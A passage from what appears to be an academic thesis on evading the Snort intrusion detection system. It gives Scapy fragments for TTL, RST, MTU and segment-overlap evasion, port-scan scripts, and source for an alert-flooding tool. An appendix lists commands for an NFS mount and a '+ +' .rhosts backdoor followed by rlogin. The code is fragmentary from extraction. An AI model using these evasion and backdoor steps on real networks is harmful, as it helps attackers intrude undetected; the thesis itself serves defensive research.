Defense against TTL related attacks is more difficult at the packet level than
at the fragment level as Snort has no configuration options which would allow
43
5. ATTACKS IMPLEMENTATION
ignoring packets with a low TTL value. It can be set only in the rule definition
which is common for all monitored hosts. Other defensive measures are the same
as mentioned in section 5.1.6.
D. RST segment
Attacker establishes a TCP session with the victim. During the communication
she sends a RST segment with a low TTL field value. IDS supposes the session
was terminated and deletes the session record. Consequently the attacker can
send malicious packets at will.
4. payload1 = "bogus"
5. payload2 = ""
6. payload3 = "/etc/passwd"
22.1 ip.ttl = 1
22.2 PUSH.flags = "R"
22.3 send(ip/PUSH/payload2,inter=70)
22.4 PUSH.flags = "PA"
22.5 ip.ttl = 64
First packet is send as a decoy only to confirm the session was established how-
ever it also could contain a part of the malicious content. Second packet contains
the TCP segment with RST flag set. It has a low TTL value and will not reach the
victim. After that the attacker has to wait because Snort observes the traffic for
any signs the connection was not terminated. Subsequent communication is still
monitored but is not considered a part of the established session.
Although alerts A1 and A2 were generated the attack itself was successful. String
/etc/passwd was sent unmodified but the session was not in the established
state. Therefore the alert A4 was not generated. This technique cannot be used
to avoid network layer signatures but is quite easy and effective for transport
layer signatures. The time which must the attacker wait must be longer than the
Stream5’s TCP timeout. Setting the high timeout as a defensive measure is a con-
44
5. ATTACKS IMPLEMENTATION
troversial step. High value leaves Snort prone to the denial of service attack which
is aimed on the session buffer exhaustion. Possible solution is to send a RST seg-
ment from the IDS to the victim any time it detects a RST segment supposing
from the attacker to the victim, thus making sure the RST segment reached the
host. Previously discussed packet TTL defensive methods are also applicable.
All TTL attacks can be automated and be used by worms with a certain prob-
ability of successful detection avoidance. Also they are independent on operating
systems of the victim and the IDS.
The attacker sends the first packet in a normal way. Second packet has “Don’t
fragment” bit set and is intentionally created to be larger than MTU of the path
to the victim. Second packet is not received by the victim. Third packet delivers
the second part of the malicious content and is linked with the first packet in the
victim’s TCP stack.
4. payload1 = "/etc"
5. payload2 = "x"*100
6. payload3 = "/passwd"
7. attacker_mod1 = 0
8. attacker_mod2 = -100
9. ip = IP(src="10.0.1.2",dst="10.0.2.5",flags="DF")
45
5. ATTACKS IMPLEMENTATION
MTU evasion technique is not common. Current environments are usually built
entirely upon Ethernet standard with a constant MTU value where this attack
is not applicable. Difficulty of launching this attack is quite low. Attack itself is
operating system independent. In complex environments the best defense is to
put an IDS probe into each monitored subnet. Also traffic normalization (packets
bigger than a certain threshold are discarded) is possible.
2. dest_port = 23
4. payload1 = "/etc"
5. payload2 = "/pa"
6. payload3 = "sswd\n"
46
5. ATTACKS IMPLEMENTATION
The order in which the TCP data is sorted is specified by the sequence number
in the TCP header. Ambiguities in protocol definitions led to multiple different
implementations of the TCP reassembly. Differences between implementations
can be exploited by the attacker. Differences can be often found in how overlap-
ping segments are handled, particulary whether the first received data or the last
received data is preferred.
A. Client OS: Windows XP, Stream5 reassembly policy: Last
Second segment is partially overlapping the first segment. Attacker exploits Snort’s
misconfiguration. If it is set to use a different TCP stream reassembly policy than
the one which is actually used on the victim the attacker may cause inconsisten-
cies between how the traffic is reassembled on the IDS and on the victim.
4. payload1 = "/etc"
5. payload2 = "xx/passwd"
7. attacker_mod1 = -2
IDS interprets the traffic as /exx/passwd but the victim interprets the traffic as
/etc/passwd.
B. Client OS: Windows XP, Stream5 reassembly policy: Linux
Policy Last which was used in the previous attack variant is not utilized by any of
common operating systems. Linux policy is very similar to Windows XP policy
so the traffic modification is more complex.
4. payload1 = "/etc"
5.1 payload21 = "/pass"
5.2 payload22 = "/xxxxwd"
6. payload3 = "\n"
7. attacker_mod1 = 0
23.1 send(ip/PUSH/payload21)
23.2 send(ip/PUSH/payload22)
24. num_seq = num_seq + len(payload22)
IDS interprets the traffic as /etc/xxxxwd but victim interprets the traffic as
/etc/passwd.
47
5. ATTACKS IMPLEMENTATION
Segment overlay attacks are not very easy to implement. Moreover Stream5 pre-
processor enables target-based TCP reassembly and with proper configuration
these attacks are made impossible. The major setback when defending against
them is the passive mapping of policies. Policy for each host or subnet is config-
ured in the Snort’s configuration file and has to be altered manually.
5.2.1 Methodology
Each portscan evasion technique was tested during a scan of ports 1 to 1024 on a
Windows XP SP2 machine. There were three open ports: 135, 139 and 445. Tests
were performed both with and without running firewall. In every scan each des-
tination port was probed only once (with an exception of destination port ran-
domization). The testing was performed in the virtual environment with no other
48
5. ATTACKS IMPLEMENTATION
traffic.
Evasion technique was evaluated successful (marked “Success”) if both these
conditions were satisfied at once:
Scans and their modifications were implemented using Scapy. Full scripts can
be found in Appendix B. All three sfPortscan sensitivity levels were checked.
Following sfPortscan configuration was used:
preprocessor sfportscan: proto { all } \
memcap { 10000000 } \
sense_level { high } \
logfile { /etc/snort/sfportscan.log } \
detect_ack_scans \
include_midstream
49
5. ATTACKS IMPLEMENTATION
Two distinct trends can be observed. First, avoiding detection is easier if the at-
tacker scans ports on a host which is firewalled. Second is somewhat unexpected
result when we try to scan non-firewalled machine and sfPortscan sensitivity is
set to Medium. This setting is easier to exploit than both High and Low sensitivity
levels.
Both observations are because of two different detection methods in sfPortscan
preprocessor. Contradictory to sfPortscan manual, which states only the connec-
tion count is used at Medium and High sensitivity setting, actually both the con-
nection count and the negative responses count are utilized. The only difference
is in threshold values for each. An alert is generated if any of thresholds at the
particular level is exceeded. Table 5.13 summarizes measured thresholds for each
sensitivity level.
If the host is firewalled the number of negative responses is quite small because
50
5. ATTACKS IMPLEMENTATION
most of them are dropped by the firewall. So in that case usually the connection
count threshold is to be avoided. Conversely non-firewalled hosts produce a lot
of responses, most of them negative, and negative responses threshold is usually
exceeded. We can derive relation between X, α and β:
Table 5.12 shows that with a sufficient available time any port scan can be hidden
from detection by timing attacks. However for practical reasons lower values of
X are preferred as lower X means the shorter scan duration. Nmap with default
configuration scans 1715 ports. With the smallest safe interval of 70 seconds the
whole scan takes more than 33 hours to complete which is usually unacceptable
even if only one probe is sent to each destination port. However in current net-
works with almost every host being equipped with a local firewall the key value
is 3 seconds for each packet as it is the slowest detectable sending rate. With that
setting the Nmap set of ports is scanned in less than 90 minutes (or less than 3
hours if each port is probed more than once). It is still too high for automated
scans by viruses which rely on a quick spread but it already can be acceptable for
hackers and knowledgeable attackers.
51
5. ATTACKS IMPLEMENTATION
systems may be set to look for sequences of ports in some time window. Random-
izing the order in which ports are probed makes the scan go undetected.
Multiple sources emulation
The attack may go undetected if an attacker can persuade the IDS that there are
many scanning hosts. Attacker may use decoys or a fully distributed scanning.
Decoys are packets with spoofed source IP addresses. Attacker never receives re-
sponses from decoy probes but if the scan is detected the victim or the IDS cannot
determine which source IP address belongs to the attacker. Since the decoy scan
is detected every time (because the attacker’s machine must perform whole scan-
ning in order to get full results) it is not a part of this survey. Distributed port scan-
ning means the attacker controls several machines. She divides the destination
ports pool among them in such a way that none of them exceeds preset thresh-
olds for the port scan detection. Nmap port scanner was used for the distributed
port scan testing. Several new types of sfPortscan alerts were propagated: TCP
Distributed Portscan (TCPDistP), TCP Filtered Decoy Portscan (TCPFDecP), TCP
Filtered Distributed Portscan (TCPFDistP) and TCP Decoy Portscan (TCPDecP).
sfPortscan High
Firewall On Off
Source port number
TCPFP TCPP
randomization
Destination port order s
TCPFP TCPP
randomization
Distributed port scan
TCPFDecP TCPP
2 sources
Distributed port scan TCPFDistP TCPDistP
5 sources TCPFP TCPP
52
5. ATTACKS IMPLEMENTATION
disguised with them. Every port scan which was detected without using them
was also detected with using them. The only recorded differences were in types
of alerts which were generated.
portscan = []
ip = IP(dst="10.0.2.5")
tcp_bogus = TCP(sport=5000,dport=80,flags="PA")
last = fragment(ip/tcp_bogus,fragsize=16)
for x in range (1,1024):
tcp = TCP(sport=5000,dport=x,flags="S")
first = fragment(ip/tcp,fragsize=16)
portscan.append(first[0])
portscan.append(last[0])
portscan.append(first[1])
ans,unans = sr(portscan)
Attacker creates a simple SYN scan traffic. The target of the scan is an IP address
10.0.2.5, a source port is 5000 and destination ports are in range from 1 to 1024. At-
tacker also creates a bogus packet which has a destination port 80 and PSH+ACK
flag set. Both the bogus packet and ordinary packets are fragmented. Each of
them is divided into two fragments. Fragments are so small that the TCP header
is cut. First fragment contains source port, destination port, sequence number,
acknowledgement number, TCP flags and window size.
All fragments have the same identification so the IDS and the victim will as-
sume they are legitimate and will process them according to their policy. Win-
dows policy always prefers the first received data whereas the Linux policy prefers
the last received data. Windows victim will reassemble packets 1A1B, 2A2B, 3A3B
etc. IDS will reassemble packets XA1B, XA2B, XA2B etc where XA represents the
first fragment of the bogus packet.
Port scan detection is made difficult because:
• TCP checksums on packets which are received by the IDS are incorrect and
packets should be dropped.
53
5. ATTACKS IMPLEMENTATION
• The connection count is low because the IDS perceives all packets as headed
for port 80.
• The scan does not appear as SYN scan because the PSH+ACK flag is seen
instead of the SYN flag.
The proposed scan modification was not detected by Snort under any tested con-
ditions (still assuming misconfiguration of frag3 reassembly policy). There are
two limitations. First, the results must be collected via an ordinary packet sniffer;
Scapy itself is not capable of matching incoming responses with requests. Second,
in order for this attack to succeed the attacker must have a certain prior knowl-
edge about the target environment, particularly what operating system is used on
the target. However these limitations are example-specific and may not apply in
other cases of the packet level evasion. Defense is problematic because every part
54
5. ATTACKS IMPLEMENTATION
of the attack has to be countered. Methods are the same as discussed previously
in Chapter 5.
Summary
Simple port scan evasion techniques (destination port order randomization, source
port randomization, multiple sources emulation) has been already rendered ob-
solete. Prinicpially every IDS can be evaded by the means of timing attack. The
biggest concern is whether the evasion takes a longer time than what is practical
for a possible attacker. By combining of several ordinary evasion methods with
specific port scan evasion methods the probability of detection avoidance can be
increased. Such attacks can be environment and even host specific so their general
description and recognition is virtually impossible.
• Alert types are diversified. If all false positives are from a limited class of
alerts then false positives can be filtered out.
• The order of false positives is random. If false positives are received always
in the same order then such repetitive sets of alerts can be filtered out.
• A subset of the false positives set is of the same class as the attack which is
to be hidden. Otherwise if only specific false positives are produced they
may be ignored.
• Alerts are generated for the majority of hosts in the network. In this case
hiding the identity of the attacker is crucial. Spreading attacks across the
network disallows the easy source detection.
Several tools have been created to produce false positives for Snort (e.g. Sneeze,
fpg, Snot). For Snort the most known is Stick [Cor01]. Stick parses Snort’s rule
files, creates matching packets and sends them in a random order to the specified
network. However packets have the wrong TCP checksum, UDP packets are mal-
formed and most of all Stick is not able to perform 3-way handshake or maintain
the context of the session. Against Snort with default configuration the Stick is
unable to produce any false positives.
55
5. ATTACKS IMPLEMENTATION
5.3.1 Novaburn
I created a script which parses given file with Snort rules, picks suitable rules,
creates packet objects in Scapy accordingly and send them to the target host. Full
script can be found in Appendix C. Basic methods are described.
CreatePackets(filename)
CreatePackets function opens the rules file specified in the filename and creates
matching packets. Rules with the content specified by regular expressions and
rules which check traffic going from server to the attacker are not used. Ports
are either read from the file or given random values. Source IP address, desti-
nation IP address and TCP flags are copied from global variables source_ip,
destination_ip and setflag. The output of the function is an array of pack-
ets.
CreateJumbo(SourcePacketArray,ip,tcp,Count)
CreateJumbo function creates packets which generate multiple alerts at once.
Output is an array of packets of the size Count. Each packet’s payload is a permu-
tation of payloads of all packets from SourcePacketArray array. Header fields’s
values are replaced with values from ip (IP layer) and tcp (TCP layer).
NoHandshakeRush(PacketArray,Count)
NoHandshakeRush function sends packets from PacketArray. The function
terminates after the Count number of packets has been sent. Packets are sent in
the random order and can be sent repeatedly. Header fields’ values are kept un-
changed. Sent packets are not parts of established TCP sessions and as so might
be ignored by the IDS. This type of false positives generation is suitable for IP or
UDP layer rules.
SingleHandshakeRush(PacketArray,SrcPort,HostIP,DestPort,Count)
5.3.2 Methodology
False positives generation was tested on rules in telnet.rules (updated 2009/01/27)
file and tftp.rules (updated 2008/07/22) file from the current Snort rules set. Tel-
net rules check TCP traffic heading for port 23. TCP session must be in an estab-
lished state in order to generate alerts. Tftp rules check UDP traffic heading for
port 69.
Snort’s rule detection capabilities were limited only to rules which were used
as the source of packets. Preprocessors were active with default configuration.
56
5. ATTACKS IMPLEMENTATION
During each testing 15,000 packets were sent using Novaburn script to the
target Windows XP machine. For telnet packets the netcat was listening on port
23. To avoid dependence on the hardware specification the success of each attack
was assessed relatively to other attacks with average the alert per second ratio as
a comparison metric. Two types of packets were tested - simple packets each of
which was created from a single Snort rule and jumbo packets which contained
payload of all rules. Two hundred of different jumbo packets were created. Snort
event queue size was left unchanged.
Novaburn was used with following commands:
Similar tests with 3 simultaneous instances of Scapy were also performed to ver-
ify the maximum transmission rate of Scapy.
5.3.3 Results
Each test was performed 5 times and measured values were averaged.
During the measurement I noticed packets created from the telnet rule set pro-
duced “(ftp_telnet) Telnet Subnegotiation Begin Command without Subnegoti-
ation End” warning. This behavior is enabled by default so warnings were in-
cluded in results. Final measurement with the ftp_telnet preprocessor disabled
57
5. ATTACKS IMPLEMENTATION
has shown that the amount of warnings among all generated alerts is approxi-
mately 28%. Tftp packets did not produce any preprocessor warnings.
Stick tool was used for comparison. It was running for a fixed time of 5 min-
utes and I measured transmitted data and produced alerts. Alerts were generated
from A1 rule mentioned in chapter as Stick is unable to create valid TCP packets.
Measured values show the attacker is able to generate at least 189 alerts per
second but in some cases she can even exceed 600 packets per second. Gener-
ally tftp related alerts were generated more easily. This is probably because of
used UDP protocol which requires less management. From attacker’s point of
view jumbo packets proved to be more advantageous then simple packets. The
increase in alerts per second ratio was more rapid than the increase in required
dataflow. With bigger event queue (default is 3) the difference would be even
greater. Absolute dataflow low never exceeded 2 Mbits/s. Stick tool proved to be
much faster than Scapy. With proper modifications (checksum computing, prior
handshake) and carefully chosen jumbo packets it should be able to exceed 2500
alerts per second. Snort had no problem handling this amount of alerts with 0
58
5. ATTACKS IMPLEMENTATION
59
6 Conclusion
Internet is a dangerous place. Linked computers are targets of constant attacks
and new more sophisticated attacks emerge every day. Reliable automated de-
tection is necessary for our systems to stay safe. Intrusion detection systems are
an essential component of the overall defense. With the increase in IDS usage we
have to focus on connected problems. An IDS which is not reliably detecting at-
tacks is potentially more dangerous than no IDS at all because it brings a false
illusion of security.
We have to understand methods used by attackers in order to be able to de-
fend against them. The goal of this thesis was to map application-independent
intrusion detection system evasion techniques, implement some of them and sug-
gest defensive approaches.
A list of existing evasion techniques was presented. Evasion techniques were
divided into five classes. Real attacks are either representatives of one of these
classes or of a conjunction of two or more classes. At least one attack from each
class was implemented and its impact was evaluated.
I concluded that evasion techniques still pose a threat in spite of they are
known for more than ten years. Most of implemented techniques were successful
at least on some conditions. Some attacks can be automated with a reasonable
probability of success (e.g. packet TTL attack, MTU attack) which predestinates
them for use by script kiddies. Several attacks even cannot be thwarted (e.g. port
scan timing attack, fragmentation timeout attack), only limited. Snort IDS pro-
vides basic countermeasures but their configuration is limited and requires non-
trivial knowledge. Other general defensive suggestions were also introduced.
Future research may focus on application-level evasion techniques or adapta-
tion of described techniques for anomaly-based IDS.
60
Bibliography
[Arb05] Michael Arboi, The NASL2 reference manual,
<http://www.nessus.org/doc/nasl2_reference.pdf> (reviewed on
2009/5/26), April 2005.
[BBE07] Jay Beale, Andrew R. Baker, and Joel Esler, Snort IDS and IPS
Toolkit, Syngress Publishing, Inc., 2007.
[Car02] Earl Carter, Cisco Secure Intrusion Detection System, Cisco Press,
2002.
[FKP+ 99] Rich Feiertag, Cliff Kahn, Phil Porras, Dan Schnackenberg, Stuart
Staniford-Chen, and Brian Tung, A Common Intrusion Specification
Language (CISL), <http://gost.isi.edu/cidf/drafts/language.txt>
(reviewed on 2009/5/26), June 1999.
61
6. C ONCLUSION
62
6. C ONCLUSION
[PYD] Samuel Patton, William Yurcik, and David Doss, An Achilles’ Heel
in Signature-Based IDS: Squealing False Positives in SNORT,
<http://www.raidsymposium.org/raid2001/papers/patton_yurcik
_doss_raid2001.pdf> (reviewed on 2009/5/26).
[SM07] Karen Scarfone and Peter Mell, Guide to Intrusion Detection and
Prevention Systems (IDPS), February 2007.
[SMCA09] Carl Smith, Ashraf Matrawy, Stanley Chow, and Bassem Abdelaziz,
Computer Worms: Architectures, Evasion Strategies, and Detection
Mechanisms, Journal of Information Assurance and Security 4
<http://www.mirlabs.org/jias/smith.pdf> (reviewed on 2009/5/26),
2009.
[SP] Umesh Shankar and Vern Paxson, Active Mapping: Resisting NIDS
Evasion Without Altering Traffic,
<http://www.icir.org/vern/papers/activemap-oak03.pdf> (reviewed on
2009/5/26).
63
A ADeLe example
Alert NFS_Mount (IN IPaddr targetip, OUT String account, OUT Connection cnx) {
<EXPLOIT>
<PRECOND>
Accesslevel == "REMOTE" #initial access level required
</PRECOND>
EVENT E0{
#Exec_shell_cmd(<shell_command>,<console_output>,<return_value>)
Exec_shell_cmd("rpcinfo -p "+targetip,rpc_services,ret_val0);
}
IF (ret_val0==0)&&("portmapper" IN rpc_services)&&("mountd" IN rpc_services){
Non_ordered{ #unspecified order!
[ Integer ret_val1;
String exported_partitions;
EVENT E1{
Exec_shell_cmd("showmount -e "+targetip,exported_partitions,ret_val1);
}
]
[ Integer ret_val2;
String users_list;
EVENT E2{
Exec_shell_cmd("finger @"+targetip,users_list,ret_val2);
}
]
}#Non_ordered
IF (ret_val1==0)&&(ret_val2==0){
String partition_found;
String user;
#Exists_exported_everyone(<input>,<partition_list>)
IF Exists_exported_everyone(exported_partitions,partition_found)
#Cross_part_users(<partition_list>,<users_list>,<matching_user>)
&& Cross_partition_users(partition_found,users_list,user){
IF !Exists_local_user(user){
Add_local_user(user); #no observable event!
}
EVENT E3 {
Exec_shell_cmd("mount -t nfs "+targetip+":/home/"+user+" /home/"+user,
output,ret_val)}
}
One_among{ #addition of "+ +" to the .rhosts file
[ EVENT E4{
Exec_shell_cmd("echo ’+ +’ >>~"+user+"/.rhosts",output,ret_val);
}
]
[ EVENT E5 {
Exec_shell_cmd("echo ’+ +’ >~"+user+"/.rhosts",output,ret_val);
}
]
}#One_Among
EVENT E6 {
shellhandler:=Exec_cmd_shell("rlogin "+targetip+" -l "+account,
output,ret_val);
}
#now we have "User" access level
account:=user;
cnx:=shellhandler;
}
}
}
</ATTACK>
<POSTCOND>
Accesslevel := "USER"
</POSTCOND>
</EXPLOIT>
<DETECTION>
<DETECT>
<EVENTS>
#list of events types occuring during this attack (IDMEF notation)
E0 : Network.Classification[0].name == "rpcinfo -p"
E1 : Network.Classification[0].name == "showmount -e"
E2 : Network.Classification[0].name == "finger @"
E3 : Network.Classification[0].name == "mount home_directory"
E4 : System.Classification[0].name == "file append"
E5 : System.Classification[0].name == "file create"
E6 : Network.Classification[0].name == "rlogin"
</EVENTS>
64
A. AD E L E EXAMPLE
<ENCHAIN>
E0 ; Non_ordered{E1 E2} ; E3 ; One_among{E4 E5} ; E6
</ENCHAIN>
<CONTEXT>
E4.File_Modified.name == ".rhosts"
E5.File_Created.name == ".rhosts"
IPAddr X := E0.Target[0].Node.Address.address
E1.Target[0].Node.Address.address == X
E2.Target[0].Node.Address.address == X
E3.Target[0].Node.Address.address == X
E4.Target[0].Node.Address.address == X
E5.Target[0].Node.Address.address == X
E6.Target[0].Node.Address.address == X
</CONTEXT>
</DETECT>
<CONFIRM>
#File_Contains(<file>,<contents>)
File_Contains("/home/"+E6.Target[0].User.name+"/.rhosts" , "+ +");
</CONFIRM>
<REPORT>
#construction of the returned alert here
Alert.version := "1"
Alert.alertid := NewAlertid()
Alert.impact := "9"
Alert.Time.time := NewTime()
Alert.Analyzer.ident := "121212"
Alert.Classification[0].origin := "ADeLe"
Alert.Classification[0].name := "NFS_Mount"
Alert.Classification[0].url := ""
Alert.Target[0].Node.Address.category := "2"
Alert.Target[0].Node.Address.address := E0.Target[0].Node.Address.address
Alert.Source[0].Node.Address.category := "2"
Alert.Source[0].Node.Address.address := E6.Source[0].Node.Address.address
</REPORT>
</DETECTION>
<RESPONSE>
</RESPONSE>
}
65
B Port scan Scapy scripts
#--------------------------------------------------
# SYN scan
#--------------------------------------------------
ans = sr(IP(dst="10.0.2.5")/TCP(dport=(1,1024),sport=5000,flags="S"))
ans[0].summary()
#--------------------------------------------------
# FIN scan
#--------------------------------------------------
ans = sr(IP(dst="10.0.2.5")/TCP(dport=(1,1024),sport=5000,flags="F"))
ans[0].summary()
#--------------------------------------------------
# Time span
#--------------------------------------------------
timespan = 0.65 # 0.33, 0.44, 0.47, 0.65, etc.
ans = sr(IP(dst="10.0.2.5")/TCP(dport=(1,1024),flags="S"),inter=timespan)
ans.summary()
#--------------------------------------------------
# Source port randiomization
#--------------------------------------------------
dport_start = 1
dport_end = 1024
sport_start = 5000
sport_end = 10000
ip = IP(dst="10.0.2.5")
tcp = TCP(dport=(dport_start,dport_end),flags="S")
packet = ip/tcp
packet_array = [x for x in packet]
for x in range(dport_start,dport_end):packet_array[x].payload.sport=random.randint(sport_start,sport_end)
ans = sr(packet_array)
ans[0].summary()
#--------------------------------------------------
# Destination port randiomization
#--------------------------------------------------
dport_start = 1
dport_end = 1024
src_port = 5000
ip = IP(dst="10.0.2.5")
tcp = TCP(dport=(dport_start,dport_end),flags="S")
packet = ip/tcp
packet_array = [x for x in packet]
for x in range(dport_start,dport_end):packet_array[x].payload.sport=src_port
for x in range(dport_start,dport_end):packet_array[x].payload.dport=random.randint(dport_start,dport_end)
ans = sr(packet_array)
ans[0].summary()
66
C False positives generator script
#--------------------------------------------------
#
# Novaburn false positives generator
#
# Vit Bukac, 2010
#--------------------------------------------------
import re
import binascii
filename = "/root/rules/telnet.rules"
source_ip = "10.0.1.5"
destination_ip = "10.0.2.5"
setflag="PA"
buffer = ’’
if arr_key_and_value[0].strip()=="isdataat":
value = arr_key_and_value[1]
number = int((value.rsplit(","))[0])
buffer = ’o’ * (number+8)
payload = payload + buffer
if RuleAcceptable:
ip = IP(src=source_ip,dst=destination_ip)
if (protocol=="tcp"):
tcp = TCP(sport=int(source_port),dport=int(destination_port),flags=setflag)
packetarray.append(ip/tcp/payload)
if (protocol=="udp"):
udp = UDP(sport=int(source_port),dport=int(destination_port))
packetarray.append(ip/udp/payload)
return packetarray
67
C. FALSE POSITIVES GENERATOR SCRIPT
# Create Jumbo packet - packet, which contains all payload from given array
# Order of payload in each jumbo packet is randomized
def CreateJumbo(SourcePacketArray,ip,tcp,PacketCount):
array = []
for j in range(PacketCount):
random.shuffle(SourcePacketArray)
JumboPayload = ’’
for i in range(len(SourcePacketArray)):
JumboPayload = JumboPayload + str(SourcePacketArray[i].payload.payload)
array.append(ip/tcp/JumboPayload)
return array
# Perform 3WH once and than send packets, overload destination settings
# packets are sent randomly
def SingleHandshakeRush(PacketArray,Once3WH_source_IP,Once3WH_destination_IP,Once3WH_destination_port,SendCount):
# Handshake
ip = IP(src=Once3WH_source_IP,dst=Once3WH_destination_IP)
SYN = TCP(sport=Once3WH_source_port,dport=Once3WH_destination_port,flags="S",seq=Once3WH_initial_seq)
SYNACK = sr1(ip/SYN)
num_ack = SYNACK.seq + 1
num_seq = Once3WH_initial_seq + 1
ACK = TCP(sport=Once3WH_source_port,dport=Once3WH_destination_port,flags="A",ack=num_ack,seq=num_seq)
send(ip/ACK)
# Send packets
for i in range(SendCount):
ChosenOne = random.randint(0,len(PacketArray)-1)
PacketArray[ChosenOne].payload.ack = num_ack
PacketArray[ChosenOne].payload.seq = num_seq
send(PacketArray[ChosenOne])
num_seq = num_seq + len(PacketArray[ChosenOne].payload.payload)
return 0
68